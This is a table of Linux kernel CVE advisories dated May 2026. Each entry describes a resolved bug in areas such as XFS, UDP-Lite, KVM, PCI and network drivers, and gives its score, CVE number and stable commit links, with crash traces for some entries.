| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/arm-cmn: Reject unsupported hardware configurations So far we've been fairly lax about accepting both unknown CMN models (at least with a warning), and unknown revisions of those which we do know, as although things do frequently change between releases, typically enough remains the same to be somewhat useful for at least some basic bringup checks. However, we also make assumptions of the maximum supported sizes and numbers of things in various places, and there's no guarantee that something new might not be bigger and lead to nasty array overflows. Make sure we only try to run on things that actually match our assumptions and so will not risk memory corruption. We have at least always failed on completely unknown node types, so update that error message for clarity and consistency too. | 2026-05-06 | 7.8 | CVE-2026-43150 | https://git.kernel.org/stable/c/7e2c200010aa93fa78201da959b4ac6b9f8fed0b https://git.kernel.org/stable/c/d3e837e11ee9ed08df229272319199003ba00379 https://git.kernel.org/stable/c/00d69f21ef2ab00e6156c764d89e2b3539eb2f33 https://git.kernel.org/stable/c/08c7eadd8a934a1968e1aeeee8b61b853b99fb3a https://git.kernel.org/stable/c/a251d866f50b6a4c95901fa722025065679c2eca https://git.kernel.org/stable/c/36c0de02575ce59dfd879eb4ef63d53a68bbf9ce |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: remove xfs_attr_leaf_hasname The calling convention of xfs_attr_leaf_hasname() is problematic, because it returns a NULL buffer when xfs_attr3_leaf_read fails, a valid buffer when xfs_attr3_leaf_lookup_int returns -ENOATTR or -EEXIST, and a non-NULL buffer pointer for an already released buffer when xfs_attr3_leaf_lookup_int fails with other error values. Fix this by simply open coding xfs_attr_leaf_hasname in the callers, so that the buffer release code is done by each caller of xfs_attr3_leaf_read. | 2026-05-06 | 7.8 | CVE-2026-43153 | https://git.kernel.org/stable/c/2fbc8421d1db102c0e5458607e042a23a03648b1 https://git.kernel.org/stable/c/457121c01f609b9934addbb04d5c1ef638c71c61 https://git.kernel.org/stable/c/530082df991903f3330354e99e0cb7b05debfa86 https://git.kernel.org/stable/c/3a65ea768b8094e4699e72f9ab420eb9e0f3f568 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: udplite: Fix null-ptr-deref in __udp_enqueue_schedule_skb(). syzbot reported null-ptr-deref of udp_sk(sk)->udp_prod_queue. [0] Since the cited commit, udp_lib_init_sock() can fail, as can udp_init_sock() and udpv6_init_sock(). Let's handle the error in udplite_sk_init() and udplitev6_sk_init(). [0]: BUG: KASAN: null-ptr-deref in instrument_atomic_read include/linux/instrumented.h:82 [inline] BUG: KASAN: null-ptr-deref in atomic_read include/linux/atomic/atomic-instrumented.h:32 [inline] BUG: KASAN: null-ptr-deref in __udp_enqueue_schedule_skb+0x151/0x1480 net/ipv4/udp.c:1719 Read of size 4 at addr 0000000000000008 by task syz.2.18/2944 CPU: 1 UID: 0 PID: 2944 Comm: syz.2.18 Not tainted syzkaller #0 PREEMPTLAZY Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 Call Trace: <IRQ> dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120 kasan_report+0xa2/0xe0 mm/kasan/report.c:595 check_region_inline mm/kasan/generic.c:-1 [inline] kasan_check_range+0x264/0x2c0 mm/kasan/generic.c:200 instrument_atomic_read include/linux/instrumented.h:82 [inline] atomic_read include/linux/atomic/atomic-instrumented.h:32 [inline] __udp_enqueue_schedule_skb+0x151/0x1480 net/ipv4/udp.c:1719 __udpv6_queue_rcv_skb net/ipv6/udp.c:795 [inline] udpv6_queue_rcv_one_skb+0xa2e/0x1ad0 net/ipv6/udp.c:906 udp6_unicast_rcv_skb+0x227/0x380 net/ipv6/udp.c:1064 ip6_protocol_deliver_rcu+0xe17/0x1540 net/ipv6/ip6_input.c:438 ip6_input_finish+0x191/0x350 net/ipv6/ip6_input.c:489 NF_HOOK+0x354/0x3f0 include/linux/netfilter.h:318 ip6_input+0x16c/0x2b0 net/ipv6/ip6_input.c:500 NF_HOOK+0x354/0x3f0 include/linux/netfilter.h:318 __netif_receive_skb_one_core net/core/dev.c:6149 [inline] __netif_receive_skb+0xd3/0x370 net/core/dev.c:6262 process_backlog+0x4d6/0x1160 net/core/dev.c:6614 __napi_poll+0xae/0x320 net/core/dev.c:7678 napi_poll net/core/dev.c:7741 [inline] net_rx_action+0x60d/0xdc0 net/core/dev.c:7893 handle_softirqs+0x209/0x8d0 kernel/softirq.c:622 do_softirq+0x52/0x90 kernel/softirq.c:523 </IRQ> <TASK> __local_bh_enable_ip+0xe7/0x120 kernel/softirq.c:450 local_bh_enable include/linux/bottom_half.h:33 [inline] rcu_read_unlock_bh include/linux/rcupdate.h:924 [inline] __dev_queue_xmit+0x109c/0x2dc0 net/core/dev.c:4856 __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline] ip6_finish_output+0x158/0x4e0 net/ipv6/ip6_output.c:219 NF_HOOK_COND include/linux/netfilter.h:307 [inline] ip6_output+0x342/0x580 net/ipv6/ip6_output.c:246 ip6_send_skb+0x1d7/0x3c0 net/ipv6/ip6_output.c:1984 udp_v6_send_skb+0x9a5/0x1770 net/ipv6/udp.c:1442 udp_v6_push_pending_frames+0xa2/0x140 net/ipv6/udp.c:1469 udpv6_sendmsg+0xfe0/0x2830 net/ipv6/udp.c:1759 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg+0xe5/0x270 net/socket.c:742 __sys_sendto+0x3eb/0x580 net/socket.c:2206 __do_sys_sendto net/socket.c:2213 [inline] __se_sys_sendto net/socket.c:2209 [inline] __x64_sys_sendto+0xde/0x100 net/socket.c:2209 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xd2/0xf20 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x7f67b4d9c629 Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f67b5c98028 EFLAGS: 00000246 ORIG_RAX: 000000000000002c RAX: ffffffffffffffda RBX: 00007f67b5015fa0 RCX: 00007f67b4d9c629 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000003 RBP: 00007f67b4e32b39 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000040000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f67b5016038 R14: 00007f67b5015fa0 R15: 00007ffe3cb66dd8 </TASK> | 2026-05-06 | 7.5 | CVE-2026-43164 | https://git.kernel.org/stable/c/f27030ac5bef47d997cfac05a3d188aa69f4df7f https://git.kernel.org/stable/c/0f13fa087ead642ea1eb5fdb6eb092c913ef06b7 https://git.kernel.org/stable/c/470c7ca2b4c3e3a51feeb952b7f97a775b5c49cd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix interlaced plain identification for encoded extents Only plain data whose start position and on-disk physical length are both aligned to the block size should be classified as interlaced plain extents. Otherwise, it must be treated as shifted plain extents. This issue was found by syzbot using a crafted compressed image containing plain extents with unaligned physical lengths, which can cause OOB read in z_erofs_transform_plain(). | 2026-05-06 | 7.1 | CVE-2026-43166 | https://git.kernel.org/stable/c/9d5a97bc71ed5783687705c708454c4453aa91d1 https://git.kernel.org/stable/c/d3790f26d38606f020212486359b84632c19d08b https://git.kernel.org/stable/c/4a2d046e4b13202a6301a993961f5b30ae4d7119 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: procfs: fix possible double mmput() in do_procmap_query() When user provides incorrectly sized buffer for build ID for PROCMAP_QUERY we return with -ENAMETOOLONG error. After recent changes this condition happens later, after we unlocked mmap_lock/per-VMA lock and did mmput(), so original goto out is now wrong and will double-mmput() mm_struct. Fix by jumping further to clean up only vm_file and name_buf. | 2026-05-06 | 7.8 | CVE-2026-43178 | https://git.kernel.org/stable/c/f9fe092084cd04deea18747f58a2304026e76aaa https://git.kernel.org/stable/c/8adaff87db143583e08eec4f4e7788f1ef8af94d https://git.kernel.org/stable/c/90f5e87c9b75833b9ef3a4415b92c0247f28ab2f https://git.kernel.org/stable/c/61dc9f776705d6db6847c101b98fa4f0e9eb6fa3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: usb: kaweth: remove TX queue manipulation in kaweth_set_rx_mode kaweth_set_rx_mode(), the ndo_set_rx_mode callback, calls netif_stop_queue() and netif_wake_queue(). These are TX queue flow control functions unrelated to RX multicast configuration. The premature netif_wake_queue() can re-enable TX while tx_urb is still in-flight, leading to a double usb_submit_urb() on the same URB: kaweth_start_xmit() { netif_stop_queue(); usb_submit_urb(kaweth->tx_urb); } kaweth_set_rx_mode() { netif_stop_queue(); netif_wake_queue(); // wakes TX queue before URB is done } kaweth_start_xmit() { netif_stop_queue(); usb_submit_urb(kaweth->tx_urb); // URB submitted while active } This triggers the WARN in usb_submit_urb(): "URB submitted while active" This is a similar class of bug fixed in rtl8150 by - commit 958baf5eaee3 ("net: usb: Remove disruptive netif_wake_queue in rtl8150_set_multicast"). Also kaweth_set_rx_mode() is already functionally broken, the real set_rx_mode action is performed by kaweth_async_set_rx_mode(), which in turn is not a no-op only at ndo_open() time. | 2026-05-06 | 7.8 | CVE-2026-43180 | https://git.kernel.org/stable/c/443a830b1dc4f85c7560da59d4494b629feee215 https://git.kernel.org/stable/c/586318c2730433184c6f1d21183e346ddf25e81d https://git.kernel.org/stable/c/a2cd4b4db315a845a5603d08c9d03b11ddfc799d https://git.kernel.org/stable/c/ef9b10a020503888eb6c8ed85a3d901a624ede4c https://git.kernel.org/stable/c/9c79b839a63980c7da7ec5db895198045e154112 https://git.kernel.org/stable/c/fc393af769af845d9985e2845e49553d8f015a64 https://git.kernel.org/stable/c/8367c0e90126426e60581e4c07e1ec4411a0f843 https://git.kernel.org/stable/c/64868f5ecadeb359a49bc4485bfa7c497047f13a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rnbd-srv: Zero the rsp buffer before using it Before using the data buffer to send back the response message, zero it completely. This prevents any stray bytes to be picked up by the client side when there the message is exchanged between different protocol versions. | 2026-05-06 | 7.5 | CVE-2026-43184 | https://git.kernel.org/stable/c/e4272754063d52c9ad0169865add8816ba696471 https://git.kernel.org/stable/c/e2cacec7d4291300a282feb3af8eba57b93b15aa https://git.kernel.org/stable/c/b646e54d23b9b592d612a2036aab14e0f6c14206 https://git.kernel.org/stable/c/30868a6a5238849d554295aff3ce61d242d7fad8 https://git.kernel.org/stable/c/7aac0a30dcf41cdb510526740d9a2ab1520c5d98 https://git.kernel.org/stable/c/c94ede3c436dfbd9cedd9cb69f604f6fc901b6a2 https://git.kernel.org/stable/c/852475278ca5e96e0c0275950e1a84203e602b33 https://git.kernel.org/stable/c/69d26698e4fd44935510553809007151b2fe4db5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: consume xmit errors of GSO frames udpgro_frglist.sh and udpgro_bench.sh are the flakiest tests currently in NIPA. They fail in the same exact way, TCP GRO test stalls occasionally and the test gets killed after 10min. These tests use veth to simulate GRO. They attach a trivial ("return XDP_PASS;") XDP program to the veth to force TSO off and NAPI on. Digging into the failure mode we can see that the connection is completely stuck after a burst of drops. The sender's snd_nxt is at sequence number N [1], but the receiver claims to have received (rcv_nxt) up to N + 3 * MSS [2]. Last piece of the puzzle is that senders rtx queue is not empty (let's say the block in the rtx queue is at sequence number N - 4 * MSS [3]). In this state, sender sends a retransmission from the rtx queue with a single segment, and sequence numbers N-4*MSS:N-3*MSS [3]. Receiver sees it and responds with an ACK all the way up to N + 3 * MSS [2]. But sender will reject this ack as TCP_ACK_UNSENT_DATA because it has no recollection of ever sending data that far out [1]. And we are stuck. The root cause is the mess of the xmit return codes. veth returns an error when it can't xmit a frame. We end up with a loss event like this: ------------------------------------------------- | GSO super frame 1 | GSO super frame 2 | |-----------------------------------------------| | seg | seg | seg | seg | seg | seg | seg | seg | | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | ------------------------------------------------- x ok ok <ok>| ok ok ok <x> \\ snd_nxt "x" means packet lost by veth, and "ok" means it went thru. Since veth has TSO disabled in this test it sees individual segments. Segment 1 is on the retransmit queue and will be resent. So why did the sender not advance snd_nxt even tho it clearly did send up to seg 8? tcp_write_xmit() interprets the return code from the core to mean that data has not been sent at all. Since TCP deals with GSO super frames, not individual segment the crux of the problem is that loss of a single segment can be interpreted as loss of all. TCP only sees the last return code for the last segment of the GSO frame (in <> brackets in the diagram above). Of course for the problem to occur we need a setup or a device without a Qdisc. Otherwise Qdisc layer disconnects the protocol layer from the device errors completely. We have multiple ways to fix this. 1) make veth not return an error when it lost a packet. While this is what I think we did in the past, the issue keeps reappearing and it's annoying to debug. The game of whack a mole is not great. 2) fix the damn return codes We only talk about NETDEV_TX_OK and NETDEV_TX_BUSY in the documentation, so maybe we should make the return code from ndo_start_xmit() a boolean. I like that the most, but perhaps some ancient, not-really-networking protocol would suffer. 3) make TCP ignore the errors It is not entirely clear to me what benefit TCP gets from interpreting the result of ip_queue_xmit()? Specifically once the connection is established and we're pushing data - packet loss is just packet loss? 4) this fix Ignore the rc in the Qdisc-less+GSO case, since it's unreliable. We already always return OK in the TCQ_F_CAN_BYPASS case. In the Qdisc-less case let's be a bit more conservative and only mask the GSO errors. This path is taken by non-IP-"networks" like CAN, MCTP etc, so we could regress some ancient thing. This is the simplest, but also maybe the hackiest fix? Similar fix has been proposed by Eric in the past but never committed because original reporter was working with an OOT driver and wasn't providing feedback (see Link). | 2026-05-06 | 7.5 | CVE-2026-43194 | https://git.kernel.org/stable/c/ae3f627b45fbc3c776a4e484696f3cad7cbb4eca https://git.kernel.org/stable/c/0c9de092ef8c50a7ee9612811566f0aa81d8d7b6 https://git.kernel.org/stable/c/56bd32c0edca34041a5c215887fcf562fae2e2db https://git.kernel.org/stable/c/9ac6aebef4b4bfc5ed408b0b65645981574bc780 https://git.kernel.org/stable/c/ea5d7787635e26ec1194ec7eec0e8e5ae3bd10a5 https://git.kernel.org/stable/c/4cb163e9efcac4cd35c3043e097f25081a5c015c https://git.kernel.org/stable/c/c86901d22c89a6bf4e2f013e948aaabc60869893 https://git.kernel.org/stable/c/7aa767d0d3d04e50ae94e770db7db8197f666970 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Fix "scheduling while atomic" in IPsec MAC address query Fix a "scheduling while atomic" bug in mlx5e_ipsec_init_macs() by replacing mlx5_query_mac_address() with ether_addr_copy() to get the local MAC address directly from netdev->dev_addr. The issue occurs because mlx5_query_mac_address() queries the hardware which involves mlx5_cmd_exec() that can sleep, but it is called from the mlx5e_ipsec_handle_event workqueue which runs in atomic context. The MAC address is already available in netdev->dev_addr, so no need to query hardware. This avoids the sleeping call and resolves the bug. Call trace: BUG: scheduling while atomic: kworker/u112:2/69344/0x00000200 __schedule+0x7ab/0xa20 schedule+0x1c/0xb0 schedule_timeout+0x6e/0xf0 __wait_for_common+0x91/0x1b0 cmd_exec+0xa85/0xff0 [mlx5_core] mlx5_cmd_exec+0x1f/0x50 [mlx5_core] mlx5_query_nic_vport_mac_address+0x7b/0xd0 [mlx5_core] mlx5_query_mac_address+0x19/0x30 [mlx5_core] mlx5e_ipsec_init_macs+0xc1/0x720 [mlx5_core] mlx5e_ipsec_build_accel_xfrm_attrs+0x422/0x670 [mlx5_core] mlx5e_ipsec_handle_event+0x2b9/0x460 [mlx5_core] process_one_work+0x178/0x2e0 worker_thread+0x2ea/0x430 | 2026-05-06 | 7.5 | CVE-2026-43199 | https://git.kernel.org/stable/c/e1407fb7c337373dfaaae2445d828b0b9ae26a29 https://git.kernel.org/stable/c/57957bc7f1865778ec9b1618e15515feb6df7eb4 https://git.kernel.org/stable/c/546de94e41e92e1f7dc6213615fb7c794d05db98 https://git.kernel.org/stable/c/859380694f434597407632c29f30fdb5e763e6cc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: atm: fore200e: fix use-after-free in tasklets during device removal When the PCA-200E or SBA-200E adapter is being detached, the fore200e is deallocated. However, the tx_tasklet or rx_tasklet may still be running or pending, leading to use-after-free bug when the already freed fore200e is accessed again in fore200e_tx_tasklet() or fore200e_rx_tasklet(). One of the race conditions can occur as follows: CPU 0 (cleanup) | CPU 1 (tasklet) fore200e_pca_remove_one() | fore200e_interrupt() fore200e_shutdown() | tasklet_schedule() kfree(fore200e) | fore200e_tx_tasklet() | fore200e-> // UAF Fix this by ensuring tx_tasklet or rx_tasklet is properly canceled before the fore200e is released. Add tasklet_kill() in fore200e_shutdown() to synchronize with any pending or running tasklets. Moreover, since fore200e_reset() could prevent further interrupts or data transfers, the tasklet_kill() should be placed after fore200e_reset() to prevent the tasklet from being rescheduled in fore200e_interrupt(). Finally, it only needs to do tasklet_kill() when the fore200e state is greater than or equal to FORE200E_STATE_IRQ, since tasklets are uninitialized in earlier states. In a word, the tasklet_kill() should be placed in the FORE200E_STATE_IRQ branch within the switch...case structure. This bug was identified through static analysis. | 2026-05-06 | 7.5 | CVE-2026-43203 | https://git.kernel.org/stable/c/91f25749aaf57c47ae1e12478144e6ea8c8562f2 https://git.kernel.org/stable/c/73fbc5d1a9ccb626937500bbd67136f077d8237b https://git.kernel.org/stable/c/aba0b4bc09376dfc3d53c826514fe38fc8337f52 https://git.kernel.org/stable/c/e075ec9b08f862dade8011481058f7eb5f716c57 https://git.kernel.org/stable/c/97900f512252a59f23d6ce4ab215cc88fed66e68 https://git.kernel.org/stable/c/e4ff4e3ffcf9d5aad380cdd1d8cdc008bb34f97d https://git.kernel.org/stable/c/5189368f10903956be05062d160b2804bf5e5016 https://git.kernel.org/stable/c/8930878101cd40063888a68af73b1b0f8b6c79bc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Fix out-of-bounds write in kfd_event_page_set() The kfd_event_page_set() function writes KFD_SIGNAL_EVENT_LIMIT * 8 bytes via memset without checking the buffer size parameter. This allows unprivileged userspace to trigger an out-of bounds kernel memory write by passing a small buffer, leading to potential privilege escalation. | 2026-05-06 | 7.8 | CVE-2026-43206 | https://git.kernel.org/stable/c/3e04bc310d80b46eaf481f1fefcbcb37a187412d https://git.kernel.org/stable/c/de8d7a25cd2eb5875b1d8d4fbc7fe4b4138b781f https://git.kernel.org/stable/c/b4034442cb090e4a980bdcc1540948606cbc951b https://git.kernel.org/stable/c/4857c37c7ba9aa38b9a4c694e8bd8d0091c87940 https://git.kernel.org/stable/c/75fb57efdd7863fffbc39db23e9cad7aafda26ed https://git.kernel.org/stable/c/bfcd6b53e1f4feb182952f4ff9a137c36ceaf20b https://git.kernel.org/stable/c/4e72f419e4ed44cb3b60506752d8688c20a60a9b https://git.kernel.org/stable/c/8a70a26c9f34baea6c3199a9862ddaff4554a96d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mtk-mdp: Fix error handling in probe function Add mtk_mdp_unregister_m2m_device() on the error handling path to prevent resource leak. Add check for the return value of vpu_get_plat_device() to prevent null pointer dereference. And vpu_get_plat_device() increases the reference count of the returned platform device. Add platform_device_put() to prevent reference leak. | 2026-05-06 | 7.8 | CVE-2026-43207 | https://git.kernel.org/stable/c/9d9c67976eda502edc6b3a148a1c5b6a18b69a98 https://git.kernel.org/stable/c/0bc43eaf021347f8d5aba87712c36b799695eec6 https://git.kernel.org/stable/c/9d7962d5c81d6cf3f8dbdb5c71c57600bac5772b https://git.kernel.org/stable/c/12cafc15d24611bfb43c82877b1bbb7454a85d5a https://git.kernel.org/stable/c/c8737d33d4e8ffae87e5d5edac17f8a705235cc2 https://git.kernel.org/stable/c/b3fc99fe5b25613dd61c57bc70b8479adff4f60d https://git.kernel.org/stable/c/2e8f53a7382943411557e370f1a4f3946624a30e https://git.kernel.org/stable/c/8a8a3232abac5b972058a5f2cb3e33199d2a8648 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI: Fix pci_slot_trylock() error handling Commit a4e772898f8b ("PCI: Add missing bridge lock to pci_bus_lock()") delegates the bridge device's pci_dev_trylock() to pci_bus_trylock() in pci_slot_trylock(), but it forgets to remove the corresponding pci_dev_unlock() when pci_bus_trylock() fails. Before a4e772898f8b, the code did: if (!pci_dev_trylock(dev)) /* <- lock bridge device */ goto unlock; if (dev->subordinate) { if (!pci_bus_trylock(dev->subordinate)) { pci_dev_unlock(dev); /* <- unlock bridge device */ goto unlock; } } After a4e772898f8b the bridge-device lock is no longer taken, but the pci_dev_unlock(dev) on the failure path was left in place, leading to the bug. This yields one of two errors: 1. A warning that the lock is being unlocked when no one holds it. 2. An incorrect unlock of a lock that belongs to another thread. Fix it by removing the now-redundant pci_dev_unlock(dev) on the failure path. [Same patch later posted by Keith at https://patch.msgid.link/20260116184150.3013258-1-kbusch@meta.com] | 2026-05-06 | 7.8 | CVE-2026-43211 | https://git.kernel.org/stable/c/ebb27b7399ab8b9eb1f792b329aa5f6250c590d4 https://git.kernel.org/stable/c/fbe06a3058114bf95a17a4941b205f4b321c6f0a https://git.kernel.org/stable/c/943ed56606a7ab2fe5a99cad572dd17d484310c7 https://git.kernel.org/stable/c/a19b61fdb958ffadbba85b43c991eb9fc70c1c1c https://git.kernel.org/stable/c/0425aaf20b407d2f2cf3bf469808e4a35f9abb8b https://git.kernel.org/stable/c/bd435f4b738130d732ef64e0e57e45185f77165d https://git.kernel.org/stable/c/8b08ea9690b212b7bf7f12414039259cf34b1aa0 https://git.kernel.org/stable/c/9368d1ee62829b08aa31836b3ca003803caf0b72 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: LoongArch: Make cpumask_of_node() robust against NUMA_NO_NODE The arch definition of cpumask_of_node() cannot handle NUMA_NO_NODE - which is a valid index - so add a check for this. | 2026-05-06 | 7.8 | CVE-2026-43212 | https://git.kernel.org/stable/c/b5bf05e05cdf489a04137e4da407de9d4cca5295 https://git.kernel.org/stable/c/bb1a54f7f011f19ed936632698eae574e0b91063 https://git.kernel.org/stable/c/92adfb707beec0fe956424373654a70aad35ea13 https://git.kernel.org/stable/c/61a56df2fbaad3a4d00f0c6a904b5d1ee8982eb4 https://git.kernel.org/stable/c/1d8f2f024801019d85159a020b72a4424b46bcf4 https://git.kernel.org/stable/c/94b0c831eda778ae9e4f2164a8b3de485d8977bb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw89: pci: validate sequence number of TX release report Hardware rarely reports abnormal sequence number in TX release report, which will access out-of-bounds of wd_ring->pages array, causing NULL pointer dereference. BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 1 PID: 1085 Comm: irq/129-rtw89_p Tainted: G S U 6.1.145-17510-g2f3369c91536 #1 (HASH:69e8 1) Call Trace: <IRQ> rtw89_pci_release_tx+0x18f/0x300 [rtw89_pci (HASH:4c83 2)] rtw89_pci_napi_poll+0xc2/0x190 [rtw89_pci (HASH:4c83 2)] net_rx_action+0xfc/0x460 net/core/dev.c:6578 net/core/dev.c:6645 net/core/dev.c:6759 handle_softirqs+0xbe/0x290 kernel/softirq.c:601 ? rtw89_pci_interrupt_threadfn+0xc5/0x350 [rtw89_pci (HASH:4c83 2)] __local_bh_enable_ip+0xeb/0x120 kernel/softirq.c:499 kernel/softirq.c:423 </IRQ> <TASK> rtw89_pci_interrupt_threadfn+0xf8/0x350 [rtw89_pci (HASH:4c83 2)] ? irq_thread+0xa7/0x340 kernel/irq/manage.c:0 irq_thread+0x177/0x340 kernel/irq/manage.c:1205 kernel/irq/manage.c:1314 ? thaw_kernel_threads+0xb0/0xb0 kernel/irq/manage.c:1202 ? irq_forced_thread_fn+0x80/0x80 kernel/irq/manage.c:1220 kthread+0xea/0x110 kernel/kthread.c:376 ? synchronize_irq+0x1a0/0x1a0 kernel/irq/manage.c:1287 ? kthread_associate_blkcg+0x80/0x80 kernel/kthread.c:331 ret_from_fork+0x1f/0x30 arch/x86/entry/entry_64.S:295 </TASK> To prevent crash, validate rpp_info.seq before using. | 2026-05-06 | 7.5 | CVE-2026-43213 | https://git.kernel.org/stable/c/ef7fa19809b2d892d45da53f90ac698d13c367fd https://git.kernel.org/stable/c/b342dd13aedccb0dd27365f6cc63a262f42394ce https://git.kernel.org/stable/c/957eda596c7665f2966970fd1dcc35fe299b38e8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Add SRCU protection for reading PDPTRs in __get_sregs2() Add SRCU read-side protection when reading PDPTR registers in __get_sregs2(). Reading PDPTRs may trigger access to guest memory: kvm_pdptr_read() -> svm_cache_reg() -> load_pdptrs() -> kvm_vcpu_read_guest_page() -> kvm_vcpu_gfn_to_memslot() kvm_vcpu_gfn_to_memslot() dereferences memslots via __kvm_memslots(), which uses srcu_dereference_check() and requires either kvm->srcu or kvm->slots_lock to be held. Currently only vcpu->mutex is held, triggering lockdep warning: ============================= WARNING: suspicious RCU usage in kvm_vcpu_gfn_to_memslot 6.12.59+ #3 Not tainted include/linux/kvm_host.h:1062 suspicious rcu_dereference_check() usage! other info that might help us debug this: rcu_scheduler_active = 2, debug_locks = 1 1 lock held by syz.5.1717/15100: #0: ff1100002f4b00b0 (&vcpu->mutex){+.+.}-{3:3}, at: kvm_vcpu_ioctl+0x1d5/0x1590 Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0xf0/0x120 lib/dump_stack.c:120 lockdep_rcu_suspicious+0x1e3/0x270 kernel/locking/lockdep.c:6824 __kvm_memslots include/linux/kvm_host.h:1062 [inline] __kvm_memslots include/linux/kvm_host.h:1059 [inline] kvm_vcpu_memslots include/linux/kvm_host.h:1076 [inline] kvm_vcpu_gfn_to_memslot+0x518/0x5e0 virt/kvm/kvm_main.c:2617 kvm_vcpu_read_guest_page+0x27/0x50 virt/kvm/kvm_main.c:3302 load_pdptrs+0xff/0x4b0 arch/x86/kvm/x86.c:1065 svm_cache_reg+0x1c9/0x230 arch/x86/kvm/svm/svm.c:1688 kvm_pdptr_read arch/x86/kvm/kvm_cache_regs.h:141 [inline] __get_sregs2 arch/x86/kvm/x86.c:11784 [inline] kvm_arch_vcpu_ioctl+0x3e20/0x4aa0 arch/x86/kvm/x86.c:6279 kvm_vcpu_ioctl+0x856/0x1590 virt/kvm/kvm_main.c:4663 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:907 [inline] __se_sys_ioctl fs/ioctl.c:893 [inline] __x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:893 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xbd/0x1d0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2026-05-06 | 7.8 | CVE-2026-43214 | https://git.kernel.org/stable/c/f621ca24f9f489e226e22560761b04884984133b https://git.kernel.org/stable/c/708e20c66b2761d878a2bc3c7534e7f814e4dec5 https://git.kernel.org/stable/c/9f2bfea51151dfbb24b52f452eb3d5f5fe0e506e https://git.kernel.org/stable/c/57536ff0a6bd69a5808d682925202babdb5ddc13 https://git.kernel.org/stable/c/b33f8d816950b10e7879cd8ffd7ae4b649ada4db https://git.kernel.org/stable/c/95d848dc7e639988dbb385a8cba9b484607cf98c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: verisilicon: AV1: Fix tile info buffer size Each tile info is composed of: row_sb, col_sb, start_pos and end_pos (4 bytes each). So the total required memory is AV1_MAX_TILES * 16 bytes. Use the correct #define to allocate the buffer and avoid writing tile info in non-allocated memory. | 2026-05-06 | 7.8 | CVE-2026-43222 | https://git.kernel.org/stable/c/a5b1ddbe31f49b4da78642157589970e9b60a231 https://git.kernel.org/stable/c/34f36f9c6114af781a5a4f7a7c99334c85b73fc7 https://git.kernel.org/stable/c/f122f2b3ce9dbde60bf7ab0b180fe4a01f9d9bc4 https://git.kernel.org/stable/c/74abfadd7ef5ac9f3a6111d550cc651d1457c641 https://git.kernel.org/stable/c/a505ca2db89ad92a8d8d27fa68ebafb12e04a679 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/rds: No shortcut out of RDS_CONN_ERROR RDS connections carry a state "rds_conn_path::cp_state" and transitions from one state to another and are conditional upon an expected state: "rds_conn_path_transition." There is one exception to this conditionality, which is "RDS_CONN_ERROR" that can be enforced by "rds_conn_path_drop" regardless of what state the condition is currently in. But as soon as a connection enters state "RDS_CONN_ERROR", the connection handling code expects it to go through the shutdown-path. The RDS/TCP multipath changes added a shortcut out of "RDS_CONN_ERROR" straight back to "RDS_CONN_CONNECTING" via "rds_tcp_accept_one_path" (e.g. after "rds_tcp_state_change"). A subsequent "rds_tcp_reset_callbacks" can then transition the state to "RDS_CONN_RESETTING" with a shutdown-worker queued. That'll trip up "rds_conn_init_shutdown", which was never adjusted to handle "RDS_CONN_RESETTING" and subsequently drops the connection with the dreaded "DR_INV_CONN_STATE", which leaves "RDS_SHUTDOWN_WORK_QUEUED" on forever. So we do two things here: a) Don't shortcut "RDS_CONN_ERROR", but take the longer path through the shutdown code. b) Add "RDS_CONN_RESETTING" to the expected states in "rds_conn_init_shutdown" so that we won't error out and get stuck, if we ever hit weird state transitions like this again." | 2026-05-06 | 7.5 | CVE-2026-43226 | https://git.kernel.org/stable/c/9bcd7c00691a2db9745817d5ea79262a503b135c https://git.kernel.org/stable/c/a179ac7be8f5a650d0068040705f4cddd6ca369c https://git.kernel.org/stable/c/19e384a7d00d888303a8285977cdf1970c6cccd6 https://git.kernel.org/stable/c/f0f729bdffb08af32e0f54521b81b8a9e0321f16 